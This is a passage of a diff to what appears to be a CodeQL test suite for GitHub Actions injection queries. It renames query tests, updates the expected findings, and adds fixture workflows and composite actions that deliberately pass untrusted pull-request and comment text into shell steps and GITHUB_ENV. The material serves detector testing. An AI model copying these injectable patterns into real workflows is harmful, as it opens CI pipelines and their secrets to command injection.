"pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref new file mode 100644 index 00000000000..b3f6c4bf782 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref new file mode 100644 index 00000000000..fc6a3a80c98 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref deleted file mode 100644 index ba2d522c03d..00000000000 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/PrivilegedEnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref deleted file mode 100644 index 4562004b990..00000000000 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/PrivilegedEnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref deleted file mode 100644 index e38b88f2919..00000000000 --- a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-078/CommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected similarity index 61% rename from ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected rename to ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index 8829557368b..e2fe23cccc6 100644 --- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -4,5 +4,5 @@ nodes | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref new file mode 100644 index 00000000000..0cdb9a399a8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-078/CommandInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-078/CommandInjection.expected rename to ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref new file mode 100644 index 00000000000..8e1bab538bb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-078/CommandInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref deleted file mode 100644 index 2c7cc5c5fde..00000000000 --- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-078/PrivilegedCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml new file mode 100644 index 00000000000..ba7d3eec1af --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml @@ -0,0 +1,7 @@ +name: 'Test' +description: 'Test' +runs: + using: 'composite' + steps: + - shell: bash + run: echo '${{ github.event.pull_request.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/action2/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/action2/action.yml rename to ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml new file mode 100644 index 00000000000..510ad86cbfa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml @@ -0,0 +1,9 @@ +name: 'Test' +description: 'Test' +runs: + using: 'composite' + steps: + - shell: bash + env: + FOO: ${{ secrets.FOO}} + run: echo '${{ github.event.pull_request.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml new file mode 100644 index 00000000000..ba7d3eec1af --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml @@ -0,0 +1,7 @@ +name: 'Test' +description: 'Test' +runs: + using: 'composite' + steps: + - shell: bash + run: echo '${{ github.event.pull_request.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml new file mode 100644 index 00000000000..13c246f4ff3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -0,0 +1,26 @@ +name: 'Test' +description: 'Test' +inputs: + taint: + description: 'text' + required: true + default: 'Foo' +outputs: + result: + description: "result" + value: ${{ steps.step.outputs.result }} +runs: + using: 'composite' + steps: + - shell: bash + run: echo '${{ github.event.pull_request.body }}' + - name: Step + id: step + env: + FOO: ${{ inputs.taint }} + shell: bash + run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - name: Sink + id: sink + shell: bash + run: echo "${{ inputs.taint }}" diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml deleted file mode 100644 index b0a1ea5ed68..00000000000 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: '📋' - -on: - pull_request: - branches: [master] - -jobs: - changelog: - uses: ./.github/workflows/changelog.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml deleted file mode 100644 index 8a3b1b02a63..00000000000 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: '📋' - -on: - pull_request_target: - branches: [master] - -jobs: - changelog: - uses: ./.github/workflows/changelog_from_prt.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml new file mode 100644 index 00000000000..9818ad42079 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml @@ -0,0 +1,10 @@ +name: Issue Workflow +on: + pull_request_target: +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - uses: .github/actions/action1 + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml new file mode 100644 index 00000000000..e5df2a514f4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml @@ -0,0 +1,10 @@ +name: Issue Workflow +on: + pull_request: +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - uses: .github/actions/action1 + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml new file mode 100644 index 00000000000..231cddd0b88 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml @@ -0,0 +1,14 @@ +name: Issue Workflow +on: + issue_comment: +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - uses: .github/actions/action5 + id: foo + with: + taint: ${{ github.event.comment.body }} + - run: echo "${{ steps.foo.outputs.result }}" + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml similarity index 90% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml index 0ee850f183d..0c4aa93c7a5 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml @@ -3,16 +3,11 @@ name: changelog on: workflow_call: inputs: - create: - description: Add a log to the changelog - type: boolean - required: false - default: false - update: - description: Update the existing changelog - type: boolean - required: false - default: false + taint: + description: taint + type: string + required: true + default: "" jobs: changelog: @@ -32,13 +27,13 @@ jobs: update: runs-on: ubuntu-latest needs: changelog - if: (inputs.create && failure()) || (inputs.update && success()) continue-on-error: true env: file: CHANGELOG.md next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml similarity index 90% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml index 0ee850f183d..0c4aa93c7a5 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml @@ -3,16 +3,11 @@ name: changelog on: workflow_call: inputs: - create: - description: Add a log to the changelog - type: boolean - required: false - default: false - update: - description: Update the existing changelog - type: boolean - required: false - default: false + taint: + description: taint + type: string + required: true + default: "" jobs: changelog: @@ -32,13 +27,13 @@ jobs: update: runs-on: ubuntu-latest needs: changelog - if: (inputs.create && failure()) || (inputs.update && success()) continue-on-error: true env: file: CHANGELOG.md next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml new file mode 100644 index 00000000000..9c0b72dffea --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -0,0 +1,11 @@ +name: Caller + +on: + issue_comment: + +jobs: + test: + permissions: {} + uses: ./.github/workflows/reusable-workflow-1.yml + with: + taint: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml new file mode 100644 index 00000000000..46be8d7009d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -0,0 +1,10 